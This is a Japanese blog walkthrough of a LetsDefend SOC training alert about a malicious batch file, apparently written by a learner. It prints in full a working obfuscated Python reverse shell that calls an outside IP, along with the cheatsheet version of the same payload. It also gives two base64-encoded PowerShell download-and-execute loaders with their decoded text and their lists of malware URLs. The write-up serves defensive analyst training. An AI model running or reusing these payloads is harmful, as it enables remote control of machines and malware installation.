4ensiX

4ensiX

FPと言ったものはFPを選んだが表示はTPになっていることに気づいた。

LetsDefend level 1 alert SOC132 - Same Malicious File Found on Multiple Sources event-id 68

Details

EventID: 68
Event Time: March 1, 2021, 3:16 p.m.
Rule: SOC132 - Same Malicious File Found on Multiple Sources
Level: Security Analyst
Source Address 172.16.17.14
Source Hostname MikeComputer, JohnComputer, Sofia
File Name msi.bat
File Hash 3dc649bc1be6f4881d386e679b7b60c8
File Size 2,12 KB
Device Action Cleaned
Download (Password:infected): 3dc649bc1be6f4881d386e679b7b60c8.zip

playbook

Define Threat Indicator

Answer: Other

Check if the malware is quarantined/cleaned

まず、msi.batについて

$ cat msi.bat 
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('81.68.99.93', 443)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"

何か見たことあると思ったら、 LetsDefend level 1 alert SOC134 - Suspicious WMI Activity event-id 71 - 4ensiX
WMIの悪用でもあった例のpythonコードであった。前回は気が付かなかったがリバースシェルのチートシートを見ると、

Windows only
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.0.0.1', 4242)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
PayloadsAllTheThings/Reverse Shell Cheatsheet.md at master · swisskyrepo/PayloadsAllTheThings · GitHub

つまり、windowspythonのリバースシェルとして定番ものであったと。

Endpoint Security

MikeComputer

CMD History

2020-08-29 10:29: powersheLL -e JABXAHQAdQByADAAOQAxAD0AKAAoACcAUQAnACsAJwBkAHgAJwApACsAKAAnADEAOQBtACcAKwAnADkAJwApACkAOwAuACgAJwBuACcAKwAnAGUAdwAtAGkAJwArACcAdABlAG0AJwApACAAJABFAG4AVgA6AHQARQBNAHAAXAB3AE8AUgBEAFwAMgAwADEAOQBcACAALQBpAHQAZQBtAHQAeQBwAGUAIABkAGkAUgBlAEMAVABvAHIAeQA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAcwBgAGUAQwB1AFIASQBgAFQAWQBQAFIAbwBgAFQATwBDAG8ATAAiACAAPQAgACgAJwB0AGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKwAoACcALAAnACsAJwAgAHQAbAAnACkAKwAoACcAcwAnACsAJwAxADEALAAgAHQAbAAnACkAKwAnAHMAJwApADsAJABHAHkANAA3AF8ANABkACAAPQAgACgAKAAnAFkAJwArACcAOAA1AG0AaQA0AHYAJwApACsAJwB0AGQAJwApADsAJABLAHgAZgBmAHQAaQB5AD0AKAAoACcAUgAnACsAJwBvADEAJwApACsAKAAnADkAbwAnACsAJwBsADYAJwApACkAOwAkAEcAdgA1AHkAaAAzAG4APQAkAGUAbgB2ADoAdABlAG0AcAArACgAKAAoACcAdQByACcAKwAnADEAdwBvAHIAJwArACcAZAAnACkAKwAoACcAdQAnACsAJwByADEAJwArACcAMgAwADEAOQAnACkAKwAoACcAdQAnACsAJwByADEAJwApACkALQByAEUAcABsAEEAQwBFACgAWwBDAGgAYQBSAF0AMQAxADcAKwBbAEMAaABhAFIAXQAxADEANAArAFsAQwBoAGEAUgBdADQAOQApACwAWwBDAGgAYQBSAF0AOQAyACkAKwAkAEcAeQA0ADcAXwA0AGQAKwAoACcALgAnACsAKAAnAGUAeAAnACsAJwBlACcAKQApADsAJABCAGQAZgB4AGUAOAAxAD0AKAAnAFkAZAAnACsAKAAnAF8AMgBwACcAKwAnAGMAJwApACsAJwA5ACcAKQA7ACQARQBuAGkAYwA5AGIAcgA9ACYAKAAnAG4AZQB3AC0AJwArACcAbwBiAGoAJwArACcAZQBjAHQAJwApACAAbgBFAFQALgB3AEUAQgBjAGwASQBFAG4AdAA7ACQASABxADAAeQBsADAAYgA9ACgAKAAnAGgAJwArACcAdAB0ACcAKQArACgAJwBwACcAKwAnADoALwAvAHEAJwApACsAKAAnAHMAdAAnACsAJwByAGkAJwApACsAJwBkAGUAJwArACcALgAnACsAJwBjACcAKwAoACcAbwBtACcAKwAnAC8AJwApACsAKAAnAGkAbQBnAC8AJwArACcAMAAvACoAJwApACsAKAAnAGgAJwArACcAdAB0ACcAKQArACgAJwBwADoALwAvAHQAcwBrACcAKwAnAGcAJwApACsAKAAnAGUAYQByAC4AYwBvAG0ALwAnACsAJwB3AHAAJwArACcALQAnACkAKwAnAGMAbwAnACsAJwBuAHQAJwArACcAZQBuACcAKwAoACcAdAAvACcAKwAnAHUAcAAnACkAKwAnAGwAJwArACcAbwBhACcAKwAnAGQAcwAnACsAKAAnAC8AMgAnACsAJwAwACcAKQArACgAJwAxADUAJwArACcALwAwADYALwBwACcAKwAnAHoALwAqACcAKQArACcAaAB0ACcAKwAoACcAdAAnACsAJwBwACcAKwAnADoALwAvAHYAZQAnACkAKwAoACcAcgBtAGEAcwAnACsAJwBpACcAKQArACcAeQBhACcAKwAnAGEAaAAnACsAKAAnAGkALgBjACcAKwAnAG8AJwApACsAKAAnAG0ALwAnACsAJwBjACcAKwAnAGcAaQAtAGIAaQAnACsAJwBuAC8AJwApACsAKAAnADgALwAqACcAKwAnAGgAdAB0AHAAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAHcAdwAnACkAKwAoACcAdwAuAHcAJwArACcAZQAnACkAKwAoACcAYgBsACcAKwAnAGEAYgBvAHIAJwApACsAKAAnAC4AJwArACcAYwBvAG0AJwApACsAJwAuAGIAJwArACcAcgAvACcAKwAoACcAYQAnACsAJwB2AGkAcwAnACkAKwAnAG8AcwAnACsAKAAnAC8AJwArACcAUQBJACcAKwAnAFUAOQAvACcAKQArACgAJwAqAGgAdAAnACsAJwB0ACcAKQArACgAJwBwADoAJwArACcALwAvACcAKQArACgAJwB2AGkAbgAnACsAJwBpAGMAJwArACcAaQAnACkAKwAoACcAdQAnACsAJwBzAHIAYQBuAGcAZQAnACkAKwAoACcAbAAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvAGUAJwArACcAeAAnACkAKwAoACcAcABlAHIAJwArACcAaQAnACsAJwBtACcAKwAnAGUAbgB0AGEAJwApACsAKAAnAGwALwBWAEkAaABNACcAKwAnAGgAMQAnACsAJwAvACcAKQArACgAJwAqAGgAdAB0ACcAKwAnAHAAJwApACsAJwA6ACcAKwAoACcALwAnACsAJwAvACcAKwAnAHcAZQBzAHQAdgBhAGMAJwApACsAKAAnAC4AJwArACcAYwBvAG0AJwApACsAJwAvAHcAJwArACgAJwBwAC0AJwArACcAYwBvACcAKQArACcAbgB0ACcAKwAnAGUAJwArACcAbgAnACsAJwB0AC8AJwArACgAJwBHACcAKwAnAE8AWQB4AC8AKgAnACsAJwBoAHQAdAAnACkAKwAoACcAcAAnACsAJwBzADoAJwApACsAKAAnAC8ALwAnACsAJwB2ACcAKQArACgAJwBpAGUAJwArACcAdwAnACkAKwAoACcAYQBsAGwAJwArACcALgAnACkAKwAnAGUAJwArACcAdQAnACsAKAAnAC8AYwBnAGkALQAnACsAJwBiACcAKQArACcAaQBuACcAKwAoACcALwBTAGIAaAAnACsAJwBaAFAAJwApACsAJwA5AFgAJwArACcALwAnACkALgAiAFMAYABwAEwASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQASwBiAHQAZAB2AHEAdgA9ACgAKAAnAEIAJwArACcAMQB5AHUAJwApACsAKAAnAGcAJwArACcAYQB0ACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQAQQAzADcAcwA4AGsAcAAgAGkAbgAgACQASABxADAAeQBsADAAYgApAHsAdAByAHkAewAkAEUAbgBpAGMAOQBiAHIALgAiAEQAbwB3AG4AYABMAGAAbwBgAEEAZABmAEkATABFACIAKAAkAEEAMwA3AHMAOABrAHAALAAgACQARwB2ADUAeQBoADMAbgApADsAJABNAGYAMgBzAG4AcgA0AD0AKAAoACcAWAAnACsAJwBqAGkAcABpACcAKQArACcAOQAnACsAJwA0ACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAnACsAJwAtAEkAdABlAG0AJwApACAAJABHAHYANQB5AGgAMwBuACkALgAiAGwAYABlAG4ARwBgAFQASAAiACAALQBnAGUAIAAzADEAOQA5ADcAKQAgAHsAJgAoACcASQBuAHYAJwArACcAbwBrAGUAJwArACcALQBJAHQAZQBtACcAKQAoACQARwB2ADUAeQBoADMAbgApADsAJABSAHUAbgA0ADMAdAB3AD0AKAAoACcAVAB2AG8AagAnACsAJwBnACcAKQArACcAMQA4ACcAKQA7AGIAcgBlAGEAawA7ACQATQBqAGoAbABxAHkAOQA9ACgAJwBBACcAKwAoACcAZwBsACcAKwAnAGkAJwApACsAKAAnAGYAJwArACcAZwBlACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABCAGUAcwByAGYAegAxAD0AKAAnAEQAXwAnACsAJwB4ACcAKwAoACcANwAnACsAJwBvAGoAMgAnACkAKQA=

decode->

$Wtur091=(('Q'+'dx')+('19m'+'9'));('n'+'ew-i'+'tem') $EnV:tEMp\wORD\2019\ -itemtype diReCTory;[NetServicePointManager]::"s`eCuRI`TYPRo`TOCoL" = ('tl'+('s'+'12')+(','+' tl')+('s'+'11, tl')+'s');$Gy47_4d = (('Y'+'85mi4v')+'td');$Kxfftiy=(('R'+'o1')+('9o'+'l6'));$Gv5yh3n=$env:temp+((('ur'+'1wor'+'d')+('u'+'r1'+'2019')+('u'+'r1'))-rEplACE([ChaR]117+[ChaR]114+[ChaR]49),[ChaR]92)+$Gy47_4d+(''+('ex'+'e'));$Bdfxe81=('Yd'+('_2p'+'c')+'9');$Enic9br=&('new-'+'obj'+'ect') nETwEBclIEnt;$Hq0yl0b=(('h'+'tt')+('p'+'://q')+('st'+'ri')+'de'+''+'c'+('om'+'/')+('img/'+'0/*')+('h'+'tt')+('p://tsk'+'g')+('earcom/'+'wp'+'-')+'co'+'nt'+'en'+('t/'+'up')+'l'+'oa'+'ds'+('/2'+'0')+('15'+'/06/p'+'z/*')+'ht'+('t'+'p'+'://ve')+('rmas'+'i')+'ya'+'ah'+('ic'+'o')+('m/'+'c'+'gi-bi'+'n/')+('8/*'+'http'+':')+('/'+'/ww')+('ww'+'e')+('bl'+'abor')+(''+'com')+'b'+'r/'+('a'+'vis')+'os'+('/'+'QI'+'U9/')+('*ht'+'t')+('p:'+'//')+('vin'+'ic'+'i')+('u'+'srange')+('l'+'c')+'om'+('/e'+'x')+('per'+'i'+'m'+'enta')+('l/VIhM'+'h1'+'/')+('*htt'+'p')+':'+('/'+'/'+'westvac')+(''+'com')+'/w'+('p-'+'co')+'nt'+'e'+'n'+'t/'+('G'+'OYx/*'+'htt')+('p'+'s:')+('//'+'v')+('ie'+'w')+('all'+'')+'e'+'u'+('/cgi-'+'b')+'in'+('/Sbh'+'ZP')+'9X'+'/')"S`pLIt"([char]42);$Kbtdvqv=(('B'+'1yu')+('g'+'at'));foreach($A37s8kp in $Hq0yl0b){try{$Enic9br"Down`L`o`AdfILE"($A37s8kp, $Gv5yh3n);$Mf2snr4=(('X'+'jipi')+'9'+'4');If ((&('Get'+'-Item') $Gv5yh3n)"l`enG`TH" -ge 31997) {&('Inv'+'oke'+'-Item')($Gv5yh3n);$Run43tw=(('Tvoj'+'g')+'18');break;$Mjjlqy9=('A'+('gl'+'i')+('f'+'ge'))}}catch{}}$Besrfz1=('D_'+'x'+('7'+'oj2'))

JohnComputer

CMD History
1: ping raw.githubusercontent.com
2: dir
3: dir /s
4: users
5: net user

Sofia

CMD History

2020-10-18 12:17: cd
2020-10-18 12:18: dir
2020-10-18 22:17: POwersheLL -ENCOD IAAgAHMAZQB0AC0ASQBUAEUATQAgAHYAYQByAGkAQQBCAEwAZQA6AGsAegBlAFEAbABVACAAIAAoAFsAdABZAFAAZQBdACgAJwBzAFkAJwArACcAcwBUAEUAbQAnACsAJwAuAGkAJwArACcAbwAuAGQASQByAEUAQwB0AE8AUgAnACsAJwBZACcAKQAgACAAKQAgACAAOwAgACAAcwBlAHQALQB2AGEAUgBJAGEAQgBMAGUAIAAgACgAJwByAEYARwAyADUAJwArACcANAAnACkAIAAgACgAIAAgAFsAVAB5AFAAZQBdACgAJwBTAFkAJwArACcAcwBUAEUAJwArACcAbQAnACsAJwAuAG4AJwArACcAZQBUAC4AcwBFAFIAJwArACcAVgBpAEMARQBwAG8AaQBOAFQAJwArACcAbQAnACsAJwBBAE4AYQBnAEUAJwArACcAcgAnACkAIAApADsAIAAgACAAUwBlAFQALQBpAHQAZQBNACAAKAAiAHYAQQAiACsAIgByAGkAQQAiACsAIgBCAGwAZQA6ADQARwBNAHMAIgApACAAKABbAHQAWQBQAGUAXQAoACcAUwBZAFMAVAAnACsAJwBlAE0AJwArACcALgBuAEUAdAAnACsAJwAuAFMAJwArACcARQAnACsAJwBDACcAKwAnAFUAJwArACcAcgBpAHQAWQBQAFIAbwBUAG8AJwArACcAYwBvAGwAVAB5AFAARQAnACkAIAApACAAIAA7ACAAJABXAHUAYQBtADcAagBlAD0AKAAnAFcANwA5AGgAJwArACcAcAAnACsAJwA3AHQAJwApADsAJABJADIAaABmADAAYwB3AD0AJABJADIAMwBkADYAZwB5ACAAKwAgAFsAYwBoAGEAcgBdACgAOAAwACAALQAgADMAOAApACAAKwAgACQATABiAHoAeQBmADcAagA7ACQAWgBfAGwAbwBjAGsAawA9ACgAJwBVACcAKwAnAGIAegBoAGQAZwBsACcAKQA7ACAAIAAkAGsAWgBFAFEAbABVADoAOgBDAFIARQBBAHQARQBkAGkAcgBlAEMAVABPAHIAeQAoACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAIAArACAAKAAoACcATwAnACsAJwBUAGYAVwA5ACcAKwAnAGwAdQAnACsAJwBkAGEAbgBPAFQAZgAnACsAJwBBAHYAJwArACcAZwBxAGsAagAzAE8AJwArACcAVABmACcAKQAgACAALQBjAHIARQBwAEwAYQBjAGUAIAAgACgAWwBDAGgAQQByAF0ANwA5ACsAWwBDAGgAQQByAF0AOAA0ACsAWwBDAGgAQQByAF0AMQAwADIAKQAsAFsAQwBoAEEAcgBdADkAMgApACkAOwAkAEIANwBkAHQAcwB5AG4APQAoACcAWAB6ADcAJwArACcANQB2AHIAZQAnACkAOwAgACAAKABnAGkAIAAgACgAIgB2ACIAKwAiAGEAUgBJAEEAQgBsAGUAOgBSACIAKwAiAGYARwAyADUANAAiACkAIAApAC4AVgBBAEwAdQBFADoAOgBTAGUAYwB1AFIAaQBUAFkAcABSAG8AVABPAEMATwBsACAAPQAgACAAIAAkADQAZwBNAHMAOgA6AHQATABTADEAMgA7ACQAUQA2AGkAcAB1AGUAaQA9ACgAJwBMACcAKwAnAGYAbAA0ACcAKwAnAHIAcQBoACcAKQA7ACQASQA1ADMAegBpAG0AbQAgAD0AIAAoACcAUwB0ACcAKwAnAHcAawAnACsAJwAzADEAdgAnACkAOwAkAFEAeABzAG4AcAByAGEAPQAoACcAWAAxAHYAagA5ADgAJwArACcAdgAnACkAOwAkAFIAYwBjAG0AbgB2AGcAPQAoACcATQB2AGQAJwArACcAYwA3ADYAaAAnACkAOwAkAEoAMAA5AHgAYQBmADIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAwAH0AJwArACcAVwA5AGwAdQBkAGEAbgAnACsAJwB7ADAAfQBBAHYAZwAnACsAJwBxAGsAagAzACcAKwAnAHsAMAAnACsAJwB9ACcAKQAgACAALQBGACAAWwBDAEgAQQBSAF0AOQAyACkAKwAkAEkANQAzAHoAaQBtAG0AKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAEcAOQA0ADgAdwA2AHgAPQAoACcARABfACcAKwAnADgAMwAnACsAJwA2ADAAbQAnACkAOwAkAEkAYgBjAHUAbwBpADgAPQBuAGUAVwAtAG8AYABCAEoAYABFAEMAVAAgAE4AZQBUAC4AdwBlAGIAQwBsAEkAZQBOAFQAOwAkAEoAdgBtAG0AZgB5ADAAPQAoACcAaAB0ACcAKwAnAHQAcAA6ACcAKwAnAC8ALwAnACsAJwB0AHUAZAAnACsAJwBvAHIAJwArACcAaQBuACcAKwAnAHYAZQAnACsAJwBzAHQAJwArACcALgBjACcAKwAnAG8AJwArACcAbQAvAHcAcAAtAGEAZAAnACsAJwBtAGkAJwArACcAbgAvAHIARwAnACsAJwB0AG4AVQBiADUAZgAnACsAJwAvACcAKwAnACoAaAB0AHQAcAAnACsAJwA6ACcAKwAnAC8ALwBkAHAALQB3AG8AJwArACcAbQBlACcAKwAnAG4AYgBhACcAKwAnAHMAJwArACcAawBlACcAKwAnAHQALgBjACcAKwAnAG8AbQAnACsAJwAvAHcAcAAtACcAKwAnAGEAJwArACcAZABtACcAKwAnAGkAbgAvACcAKwAnAEwAaQAvACcAKwAnACoAJwArACcAaAAnACsAJwB0AHQAcAA6AC8ALwBzACcAKwAnAHQAeQBsAGUAZgBpAHgALgBjACcAKwAnAG8ALwAnACsAJwBnAHUAaQBsAGwAbwAnACsAJwB0ACcAKwAnAGkAJwArACcAbgBlAC0AYwAnACsAJwByAG8AJwArACcAcwAnACsAJwBzACcAKwAnAC8AJwArACcAQwAnACsAJwBUAFIATgBPAFEALwAqAGgAdAB0AHAAOgAvAC8AYQByAGQAJwArACcAbwBzAC4AYwBvACcAKwAnAG0ALgBiAHIALwBzAGkAbQAnACsAJwB1AGwAYQBkAG8AcgAvAGIAUABOACcAKwAnAHgALwAnACsAJwAqAGgAdAAnACsAJwB0AHAAJwArACcAOgAnACsAJwAvAC8AZAByAHQAaABlAHUAJwArACcAcgBlAGwAcAAnACsAJwBsAGEAcwB0AGkAYwBzAHUAJwArACcAcgBnAGUAJwArACcAcgB5AC4AJwArACcAYwBvAG0ALwAnACsAJwBnACcAKwAnAGUAbgAnACsAJwBlAHIAYQBsAG8ALwByAGgAJwArACcAcgBoAGYAbAAnACsAJwB2ADkAJwArACcAMgAvACoAJwArACcAaAB0AHQAcAA6AC8ALwBiAG8AZAB5AGkAbgBuACcAKwAnAG8AdgBhAHQAJwArACcAaQBvAG4AJwArACcALgBjAG8ALgB6ACcAKwAnAGEALwAnACsAJwB3AHAAJwArACcALQBjACcAKwAnAG8AbgB0AGUAbgB0AC8AMgBzAHMAJwArACcASAB2ACcAKwAnAGkALwAqAGgAdAB0AHAAOgAvAC8AJwArACcAbgBvAG0AYQBkAGMAbwAuACcAKwAnAGUAcwAnACsAJwAvAHcAcAAtACcAKwAnAGEAZAAnACsAJwBtAGkAbgAvAE0AdgB3AFYASABDAEcALwAnACkALgBTAFAATABJAFQAKAAkAFkAeQB4ADEAeQBqADkAIAArACAAJABJADIAaABmADAAYwB3ACAAKwAgACQATABjADcANQBuADAAcQApADsAJABOAHoAYQBhAGQAegBsAD0AKAAnAEwAZABoAG4AeQBwACcAKwAnAHYAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABQAGcAcABqADkAdwBhACAAaQBuACAAJABKAHYAbQBtAGYAeQAwACkAewB0AHIAeQB7ACQASQBiAGMAdQBvAGkAOAAuAGQAbwB3AG4ATABPAEEAZABGAGkATABlACgAJABQAGcAcABqADkAdwBhACwAIAAkAEoAMAA5AHgAYQBmADIAKQA7ACQARwBrAGUAaABpAHIAaQA9ACgAJwBaADIAJwArACcAcgB1ADAAJwArACcANAB4ACcAKQA7AEkAZgAgACgAKABnAEUAYABUAC0AYABJAFQAZQBNACAAJABKADAAOQB4AGEAZgAyACkALgBsAEUAbgBnAFQAaAAgAC0AZwBlACAAMgA2ADMANAA2ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAoACcAdwBpAG4AMwAnACsAJwAyAF8AUAByAG8AYwAnACsAJwBlAHMAcwAnACkAKQAuAEMAcgBlAEEAdABlACgAJABKADAAOQB4AGEAZgAyACkAOwAkAFYAagBnADkAbQAxAGoAPQAoACcAVgBrAHYAYgAnACsAJwB2AG4AJwArACcAYgAnACkAOwBiAHIAZQBhAGsAOwAkAEkAdgBjADYAagA2AGIAPQAoACcAWgAnACsAJwBiAG4AaAAyACcAKwAnADYAdwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEEANQA2AGcAcAB3ADgAPQAoACcAVwAnACsAJwA1ACcAKwAnAG8AZwB5ADAAcAAnACkA

decode->

set-ITEM variABLe:kzeQlU  ([tYPe]('sY'+'sTEm'+'i'+'odIrECtOR'+'Y')  )  ;  set-vaRIaBLe  ('rFG25'+'4')  (  [TyPe]('SY'+'sTE'+'m'+'n'+'eTsER'+'ViCEpoiNT'+'m'+'ANagE'+'r') );   SeT-iteM ("vA"+"riA"+"Ble:4GMs") ([tYPe]('SYST'+'eM'+'nEt'+'S'+'E'+'C'+'U'+'ritYPRoTo'+'colTyPE') )  ; $Wuam7je=('W79h'+'p'+'7t');$I2hf0cw=$I23d6gy + [char](80 - 38) + $Lbzyf7j;$Z_lockk=('U'+'bzhdgl');  $kZEQlU::CREAtEdireCTOry($env:userprofile + (('O'+'TfW9'+'lu'+'danOTf'+'Av'+'gqkj3O'+'Tf')  -crEpLace  ([ChAr]79+[ChAr]84+[ChAr]102),[ChAr]92));$B7dtsyn=('Xz7'+'5vre');  (gi  ("v"+"aRIABle:R"+"fG254") )VALuE::SecuRiTYpRoTOCOl =   $4gMs::tLS12;$Q6ipuei=('L'+'fl4'+'rqh');$I53zimm = ('St'+'wk'+'31v');$Qxsnpra=('X1vj98'+'v');$Rccmnvg=('Mvd'+'c76h');$J09xaf2=$env:userprofile+(('{0}'+'W9ludan'+'{0}Avg'+'qkj3'+'{0'+'}')  -F [CHAR]92)+$I53zimm+('e'+'xe');$G948w6x=('D_'+'83'+'60m');$Ibcuoi8=neW-o`BJ`ECT NeTwebClIeNT;$Jvmmfy0=('ht'+'tp:'+'//'+'tud'+'or'+'in'+'ve'+'st'+'c'+'o'+'m/wp-ad'+'mi'+'n/rG'+'tnUb5f'+'/'+'*http'+':'+'//dp-wo'+'me'+'nba'+'s'+'ke'+'tc'+'om'+'/wp-'+'a'+'dm'+'in/'+'Li/'+'*'+'h'+'ttp://s'+'tylefixc'+'o/'+'guillo'+'t'+'i'+'ne-c'+'ro'+'s'+'s'+'/'+'C'+'TRNOQ/*http://ard'+'osco'+'mbr/sim'+'ulador/bPN'+'x/'+'*ht'+'tp'+':'+'//drtheu'+'relp'+'lasticsu'+'rge'+'ry'+'com/'+'g'+'en'+'eralo/rh'+'rhfl'+'v9'+'2/*'+'http://bodyinn'+'ovat'+'ion'+'coz'+'a/'+'wp'+'-c'+'ontent/2ss'+'Hv'+'i/*http://'+'nomadco'+'es'+'/wp-'+'ad'+'min/MvwVHCG/')SPLIT($Yyx1yj9 + $I2hf0cw + $Lc75n0q);$Nzaadzl=('Ldhnyp'+'v');foreach ($Pgpj9wa in $Jvmmfy0){try{$Ibcuoi8downLOAdFiLe($Pgpj9wa, $J09xaf2);$Gkehiri=('Z2'+'ru0'+'4x');If ((gE`T-`ITeM $J09xaf2)lEngTh -ge 26346) {([wmiclass]('win3'+'2_Proc'+'ess'))CreAte($J09xaf2);$Vjg9m1j=('Vkvb'+'vn'+'b');break;$Ivc6j6b=('Z'+'bnh2'+'6w')}}catch{}}$A56gpw8=('W'+'5'+'ogy0p')




明らかにMikeとSofiaは問題を抱えていそうだが、今回のものとの関連は分からない。ただ、

Device Action Cleaned

このため今回の件に限っては、
Answer: Quarantined で良いのかと。

Analyze Malware

msi.dat

VirusTotal: https://www.virustotal.com/gui/file/7538b8a61dd42c874e7e153dad02c528f06c397344e70de01fdc98a5c28030bf
定番リバースシェルであったことは分かってしまったので、どっちみちMaliciousである。では、その接続先はどうなのか。

81.68.99.93

VirusTotal: https://www.virustotal.com/gui/ip-address/81.68.99.93
AbuseIPDB: https://www.abuseipdb.com/check/81.68.99.93
ip-sc: https://ip-sc.net/ja/r/81.68.99.93
Maliciousとのこと。SSHログイン試行が行われたというレポートが多数見られた。


Answer: Malicious

Check If Someone Requested the C2

Log Searchで81.68.99.93へのアクセスは無い。
Answer: Not Accessed

Add Artifacts

Value Type Comment
3dc649bc1be6f4881d386e679b7b60c8 MD5 Hash python reverse shell script
81.68.99.93 IP Address c2 server

End

f:id:Zarat:20220118200553p:plain
close alert event id 68